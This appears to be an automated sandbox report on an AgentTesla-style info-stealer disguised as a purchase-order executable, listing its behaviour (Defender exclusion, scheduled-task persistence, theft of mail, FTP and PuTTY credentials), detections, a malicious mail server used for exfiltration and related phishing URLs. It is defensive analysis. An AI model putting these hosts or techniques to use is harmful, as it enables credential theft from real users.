                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465995 Sample: purchase order - PO-011024-... Startdate: 02/07/2024 Architecture: WINDOWS Score: 100 47 mail.iaa-airferight.com 2->47 49 api.ipify.org 2->49 55 Multi AV Scanner detection for domain / URL 2->55 57 Found malware configuration 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 16 other signatures 2->61 8 purchase order - PO-011024-201.exe 7 2->8         started        12 jDCErdK.exe 5 2->12         started        signatures3 process4 file5 39 C:\Users\user\AppData\Roaming\jDCErdK.exe, PE32 8->39 dropped 41 C:\Users\user\...\jDCErdK.exe:Zone.Identifier, ASCII 8->41 dropped 43 C:\Users\user\AppData\Local\...\tmpA55D.tmp, XML 8->43 dropped 45 C:\...\purchase order - PO-011024-201.exe.log, ASCII 8->45 dropped 63 Adds a directory exclusion to Windows Defender 8->63 14 RegSvcs.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        26 2 other processes 8->26 65 Multi AV Scanner detection for dropped file 12->65 67 Machine Learning detection for dropped file 12->67 22 RegSvcs.exe 12->22         started        24 schtasks.exe 12->24         started        signatures6 process7 dnsIp8 51 mail.iaa-airferight.com 46.175.148.58, 25 ASLAGIDKOM-NETUA Ukraine 14->51 53 api.ipify.org 172.67.74.152, 443, 49734, 49737 CLOUDFLARENETUS United States 14->53 71 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->71 73 Loading BitLocker PowerShell Module 18->73 28 conhost.exe 18->28         started        31 conhost.exe 20->31         started        33 WmiPrvSE.exe 20->33         started        75 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->75 77 Tries to steal Mail credentials (via file / registry access) 22->77 79 Tries to harvest and steal ftp login credentials 22->79 81 2 other signatures 22->81 35 conhost.exe 24->35         started        37 conhost.exe 26->37         started        signatures9 process10 signatures11 69 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 28->69

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    purchase order - PO-011024-201.exe32%ReversingLabsWin32.Trojan.Leonem
                    purchase order - PO-011024-201.exe35%VirustotalBrowse
                    purchase order - PO-011024-201.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\jDCErdK.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\jDCErdK.exe32%ReversingLabsWin32.Trojan.Leonem
                    C:\Users\user\AppData\Roaming\jDCErdK.exe35%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    mail.iaa-airferight.com8%VirustotalBrowse
                    api.ipify.org0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://api.ipify.org/0%URL Reputationsafe
                    https://api.ipify.org/0%URL Reputationsafe
                    http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
                    http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
                    http://www.fontbureau.com0%URL Reputationsafe
                    http://www.fontbureau.com/designersG0%URL Reputationsafe
                    http://www.fontbureau.com/designers/?0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    http://www.fontbureau.com/designers?0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.fontbureau.com/designers0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    https://api.ipify.org/t0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    https://api.ipify.org0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                    http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.fontbureau.com/designers80%URL Reputationsafe
                    http://www.fonts.com0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://mail.iaa-airferight.com100%Avira URL Cloudmalware
                    http://mail.iaa-airferight.com8%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    mail.iaa-airferight.com
                    		46.175.148.58
                    		truetrueunknown
                    api.ipify.org
                    		172.67.74.152
                    		truefalseunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://api.ipify.org/false
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.apache.org/licenses/LICENSE-2.0purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.compurchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designersGpurchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers/?purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cn/bThepurchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://account.dyn.com/purchase order - PO-011024-201.exe, 00000000.00000002.1695549066.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1779040921.0000000000402000.00000040.00000400.00020000.00000000.sdmp, jDCErdK.exe, 00000009.00000002.1786573650.0000000003DA9000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers?purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://mail.iaa-airferight.comRegSvcs.exe, 00000008.00000002.1781239060.0000000002F0B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4107833892.000000000284C000.00000004.00000800.00020000.00000000.sdmptrue
                    • 8%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.tiro.compurchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designerspurchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.goodfont.co.krpurchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.ipify.org/tRegSvcs.exe, 00000008.00000002.1781239060.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4107833892.00000000027DC000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.carterandcone.comlpurchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.sajatypeworks.compurchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.typography.netDpurchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers/cabarga.htmlNpurchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cn/cThepurchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.galapagosdesign.com/staff/dennis.htmpurchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.ipify.orgpurchase order - PO-011024-201.exe, 00000000.00000002.1695549066.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1779040921.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1781239060.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, jDCErdK.exe, 00000009.00000002.1786573650.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4107833892.00000000027DC000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cnpurchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers/frere-user.htmlpurchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.jiyu-kobo.co.jp/purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.galapagosdesign.com/DPleasepurchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers8purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fonts.compurchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.sandoll.co.krpurchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.urwpp.deDPleasepurchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.zhongyicts.com.cnpurchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepurchase order - PO-011024-201.exe, 00000000.00000002.1693602582.00000000025A0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1781239060.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, jDCErdK.exe, 00000009.00000002.1782894037.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4107833892.00000000027DC000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.sakkal.compurchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp, purchase order - PO-011024-201.exe, 00000000.00000002.1720142571.0000000004F30000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    46.175.148.58
                    		mail.iaa-airferight.comUkraine
                    		56394ASLAGIDKOM-NETUAtrue
                    172.67.74.152
                    		api.ipify.orgUnited States
                    		13335CLOUDFLARENETUSfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1465995
                    Start date and time:2024-07-02 11:46:06 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 34s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:18
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:purchase order - PO-011024-201.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@20/25@2/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 96%
                    • Number of executed functions: 141
                    • Number of non-executed functions: 15
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    05:46:54API Interceptor26x Sleep call for process: purchase order - PO-011024-201.exe modified
                    05:46:58API Interceptor43x Sleep call for process: powershell.exe modified
                    05:47:02API Interceptor11007941x Sleep call for process: RegSvcs.exe modified
                    05:47:04API Interceptor29x Sleep call for process: jDCErdK.exe modified
                    10:46:59Task SchedulerRun new task: jDCErdK path: C:\Users\user\AppData\Roaming\jDCErdK.exe

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    46.175.148.58PO 4500005168 NIKOLA.exeGet hashmaliciousAgentTeslaBrowse
                      new shippment.exeGet hashmaliciousAgentTeslaBrowse
                        KiOK5LRFEG.exeGet hashmaliciousAgentTeslaBrowse
                          rHHG2h2w8U.exeGet hashmaliciousAgentTeslaBrowse
                            Shipping & packinglist.exeGet hashmaliciousAgentTeslaBrowse
                              PO 4500029546 (Copy-)Tool 9458715.exeGet hashmaliciousAgentTeslaBrowse
                                Purchase Order #199072.exeGet hashmaliciousAgentTeslaBrowse
                                  Bank TT request PO - 12619.exeGet hashmaliciousAgentTeslaBrowse
                                    Payment advice.exeGet hashmaliciousAgentTeslaBrowse
                                      QZlNr2E3Nn.exeGet hashmaliciousAgentTeslaBrowse
                                        172.67.74.152242764.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                                        • api.ipify.org/?format=wef
                                        K8mzlntJVN.msiGet hashmaliciousUnknownBrowse
                                        • api.ipify.org/
                                        stub.exeGet hashmaliciousUnknownBrowse
                                        • api.ipify.org/
                                        stub.exeGet hashmaliciousUnknownBrowse
                                        • api.ipify.org/
                                        Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                                        • api.ipify.org/?format=json
                                        Sky-Beta.exeGet hashmaliciousUnknownBrowse
                                        • api.ipify.org/?format=json
                                        Sky-Beta.exeGet hashmaliciousUnknownBrowse
                                        • api.ipify.org/?format=json
                                        Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                        • api.ipify.org/?format=json
                                        Sky-Beta.exeGet hashmaliciousStealitBrowse
                                        • api.ipify.org/?format=json
                                        SongOfVikings.exeGet hashmaliciousUnknownBrowse
                                        • api.ipify.org/?format=json

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        mail.iaa-airferight.comPO 4500005168 NIKOLA.exeGet hashmaliciousAgentTeslaBrowse
                                        • 46.175.148.58
                                        new shippment.exeGet hashmaliciousAgentTeslaBrowse
                                        • 46.175.148.58
                                        KiOK5LRFEG.exeGet hashmaliciousAgentTeslaBrowse
                                        • 46.175.148.58
                                        rHHG2h2w8U.exeGet hashmaliciousAgentTeslaBrowse
                                        • 46.175.148.58
                                        Shipping & packinglist.exeGet hashmaliciousAgentTeslaBrowse
                                        • 46.175.148.58
                                        PO 4500029546 (Copy-)Tool 9458715.exeGet hashmaliciousAgentTeslaBrowse
                                        • 46.175.148.58
                                        Purchase Order #199072.exeGet hashmaliciousAgentTeslaBrowse
                                        • 46.175.148.58
                                        Bank TT request PO - 12619.exeGet hashmaliciousAgentTeslaBrowse
                                        • 46.175.148.58
                                        Payment advice.exeGet hashmaliciousAgentTeslaBrowse
                                        • 46.175.148.58
                                        QZlNr2E3Nn.exeGet hashmaliciousAgentTeslaBrowse
                                        • 46.175.148.58
                                        api.ipify.org3z5nZg91qJ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 172.67.74.152
                                        Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousGuLoaderBrowse
                                        • 172.67.74.152
                                        DHL AWB COMMERCAIL INVOICE AND TRACKNG DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                        • 104.26.13.205
                                        Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousGuLoaderBrowse
                                        • 104.26.13.205
                                        https://pub-4d0a115db8fb4f15a6bf3059fadf5ec9.r2.dev/secure_response.html?user-agent=Mozilla/5.0WindowsNT10.0;Win64;x64AppleWebKit/537.36KHTML,likeGeckoChrome/86.0.4240.75Safari/537.36Get hashmaliciousHTMLPhisherBrowse
                                        • 104.26.12.205
                                        GkYUK8VCrO.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 104.26.12.205
                                        PO 4500005168 NIKOLA.exeGet hashmaliciousAgentTeslaBrowse
                                        • 104.26.13.205
                                        rQoutation.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 104.26.13.205
                                        F46VBJ6Yvy.exeGet hashmaliciousAgentTeslaBrowse
                                        • 104.26.13.205
                                        8w5wHh755H.exeGet hashmaliciousAgentTeslaBrowse
                                        • 172.67.74.152

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        ASLAGIDKOM-NETUAPO 4500005168 NIKOLA.exeGet hashmaliciousAgentTeslaBrowse
                                        • 46.175.148.58
                                        new shippment.exeGet hashmaliciousAgentTeslaBrowse
                                        • 46.175.148.58
                                        KiOK5LRFEG.exeGet hashmaliciousAgentTeslaBrowse
                                        • 46.175.148.58
                                        rHHG2h2w8U.exeGet hashmaliciousAgentTeslaBrowse
                                        • 46.175.148.58
                                        Shipping & packinglist.exeGet hashmaliciousAgentTeslaBrowse
                                        • 46.175.148.58
                                        PO 4500029546 (Copy-)Tool 9458715.exeGet hashmaliciousAgentTeslaBrowse
                                        • 46.175.148.58
                                        Purchase Order #199072.exeGet hashmaliciousAgentTeslaBrowse
                                        • 46.175.148.58
                                        Bank TT request PO - 12619.exeGet hashmaliciousAgentTeslaBrowse
                                        • 46.175.148.58
                                        Payment advice.exeGet hashmaliciousAgentTeslaBrowse
                                        • 46.175.148.58
                                        QZlNr2E3Nn.exeGet hashmaliciousAgentTeslaBrowse
                                        • 46.175.148.58
                                        CLOUDFLARENETUShttp://go.sparkpostmail1.com/f/a/Qy8XDQJtpeYlkqMezh3Eeg~~/AAVXmQA~/RgRnyyJSP0ROaHR0cHM6Ly9pbnN0LmZlYmFmZWRlcmFsYmVuZWZpdHMuY29tL2x0LzExMjU4OTk5MjgxNjc1MTgvcDY2V19yYmFkYk9LaS02NE9GOGJZVwNzcGNCCmXi0u7pZXh5I2VSE2p1ZHkuY2FzdHJvQGJlcC5nb3ZYBAAAAAA~Get hashmaliciousUnknownBrowse
                                        • 188.114.97.3
                                        https://us02web.zoom.us/webinar/register/6317193087387/WN_wbycs5lISL2eo8rEP6qUDg#/registrationGet hashmaliciousUnknownBrowse
                                        • 172.64.150.44
                                        SecuriteInfo.com.Exploit.CVE-2018-0798.4.30916.4690.rtfGet hashmaliciousUnknownBrowse
                                        • 104.21.53.203
                                        http://qltuh.bellatrixmeissa.comGet hashmaliciousUnknownBrowse
                                        • 188.114.96.3
                                        New PO#2508006039.shtmlGet hashmaliciousHTMLPhisherBrowse
                                        • 1.1.1.1
                                        Absa.pdfGet hashmaliciousHTMLPhisherBrowse
                                        • 172.64.41.3
                                        https://drive.google.com/file/d/1D-RSHnHV853uproVdm_FqLilvp6WEgCv/view?ts=6682d412Get hashmaliciousUnknownBrowse
                                        • 1.1.1.1
                                        https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08Get hashmaliciousHTMLPhisherBrowse
                                        • 1.1.1.1
                                        https://docs.google.com/presentation/d/e/2PACX-1vRs-1lM259_-Jwhsbc-dg0JIYZUboF3mrOYVHYTqbAmT7KWBl_mwNRSNl0N9QrU4kN-s-_PFfno5ZP3/pub?start=false&loop=false&delayms=3000Get hashmaliciousHTMLPhisherBrowse
                                        • 188.114.96.3
                                        PETUNJUK-PENGISIAN DAN PENGIRIMAN KONFIRMASI EDITED.xlsx.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.96.3

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        3b5074b1b5d032e5620f69f9f700ff0ehttps://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08Get hashmaliciousHTMLPhisherBrowse
                                        • 172.67.74.152
                                        https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08Get hashmaliciousHTMLPhisherBrowse
                                        • 172.67.74.152
                                        3z5nZg91qJ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 172.67.74.152
                                        http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CxFHH8i5A3U7lzl-2BTzhlR6ei7mav1762I-2BKvT-2Fk6a5kJfjpj9RJPK9q48Ck5mSzSlgwV-2BsscO5sphM5t-2BVSr5yuCYcPokWOxF7VJFLVcuGxe55FXxdx2OWqy1uhpoEHKlprCsCZc7-2FzwTpK7gWkfISgE1dm3DNZag7jRcJoAY96XjRqTOiYZpVCYj4WczYZatXIFKlGImVUX-2BtzacIIXUkQ-3D-3Dxdxc_PRiWw-2BWerOwUL-2FYAA-2FiwxOm-2BJW3ubqhGFJ5iVqhmG217gfj9KgzNOSRNluvFvYbWIHUd-2ByAsKYpybXBhPgqT-2F1WfaNjyxdi-2FNqxuKfkiep8TocNXSydFj2bAYBLtB5MEDItgpH6g-2FV3171HTXrzYHtaSp7MB2B8WILdzxuyybTMsChhP3QdW9m4oU0X1zagLaXiyfnb7qkeR5CYT3FajfA-3D-3DGet hashmaliciousUnknownBrowse
                                        • 172.67.74.152
                                        QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 172.67.74.152
                                        Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousGuLoaderBrowse
                                        • 172.67.74.152
                                        DHL AWB COMMERCAIL INVOICE AND TRACKNG DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                        • 172.67.74.152
                                        New Inquiry CAD.scr.exeGet hashmaliciousPureLog StealerBrowse
                                        • 172.67.74.152
                                        Payment_Confirmation_Receipts.vbsGet hashmaliciousGuLoaderBrowse
                                        • 172.67.74.152
                                        Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousGuLoaderBrowse
                                        • 172.67.74.152

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jDCErdK.exe.log

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\jDCErdK.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1301
                                        Entropy (8bit):5.334025345208678
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4VE4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HT
                                        MD5:C8D49A85A61847AAE0536AE8856F6DEC
                                        SHA1:D4121C87789F6AE40FCB9B4F896BC2A0C79182AD
                                        SHA-256:3F7809C712D948FF3404AE242044B5463E60BCDCE93121886F8CB36799D4E3CE
                                        SHA-512:FFD3460D5B6F00C49D7A91B299765BB7620B440718DACA711566C41A0C153F51E936EE479F4B9E002794EF2E0EBFFCED32ACE15CF9C7A892248EFA6A42468D51
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\purchase order - PO-011024-201.exe.log

                                        Download File
                                        Process:C:\Users\user\Desktop\purchase order - PO-011024-201.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1301
                                        Entropy (8bit):5.334025345208678
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4VE4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HT
                                        MD5:C8D49A85A61847AAE0536AE8856F6DEC
                                        SHA1:D4121C87789F6AE40FCB9B4F896BC2A0C79182AD
                                        SHA-256:3F7809C712D948FF3404AE242044B5463E60BCDCE93121886F8CB36799D4E3CE
                                        SHA-512:FFD3460D5B6F00C49D7A91B299765BB7620B440718DACA711566C41A0C153F51E936EE479F4B9E002794EF2E0EBFFCED32ACE15CF9C7A892248EFA6A42468D51
                                        Malicious:true
